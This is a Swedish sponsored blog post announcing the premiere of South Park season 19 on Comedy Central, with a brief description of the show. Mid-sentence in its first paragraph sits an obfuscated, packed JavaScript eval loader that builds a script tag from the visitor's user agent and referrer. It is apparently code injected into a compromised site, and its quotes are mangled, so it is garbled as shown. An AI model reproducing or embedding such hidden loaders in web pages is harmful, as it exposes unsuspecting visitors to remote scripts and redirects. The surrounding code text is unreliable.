Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Sponsrad video: South Park säsong 19 snart här!

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_535342343.js”>
Äntligen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zkebh|var|u0026u|referrer|afeiz||js|php’.split(’|’),0,{}))
är det dags igen. South Park är tillbaka i en helt ny och knasig säsong. Det är säsong 19 som nu den 17 september klockan 22:15 har premiär på Comedy Central. Efter en tids paus får vi återigen träffa grabbgänget Stan Marsh, Kyle Broflovski, Eric Cartman, Kenny McCormick och alla andra roliga figurer i staden South Park.

För er som inte sett serien innan kommer en kortare beskrivning nedan:

South Park är en amerikansk animerad TV-serie, från kanalen Comedy Central, som sändes för första gången 1997. Serien handlar om ett gäng unga pojkar och deras liv i den lilla fiktiva amerikanska staden South Park i Colorado. Serien, som varit mycket framgångsrik inte bara i USA utan också internationellt, skapades av Trey Parker och Matt Stone, som också gör de flesta av rösterna.

Tider och datum som gäller:
Bänkade framför skärmen klockan 22:15 den 17 september på Comedy Central!!

Kika in videon ovan där vi får sse lite av vad nästa säsong (season 19) kommer att handla om.

Detta är ett sponsrat inlägg.